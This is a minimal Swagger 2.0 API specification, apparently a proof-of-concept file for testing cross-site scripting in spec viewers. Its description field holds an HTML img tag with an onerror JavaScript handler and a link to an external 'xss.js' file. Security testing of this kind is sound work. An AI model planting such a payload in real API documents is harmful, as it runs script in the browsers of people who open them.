swagger: '2.0'
info:
  version: "0.0.1"
  title: Example title
  description: <img src=1 href=https://raw.githubusercontent.com/darianic/poc/main/xss.js onerror="javascript:alert(1)"></img>
paths:
  /:
    get:
      responses:
        200:
          description: Successful response
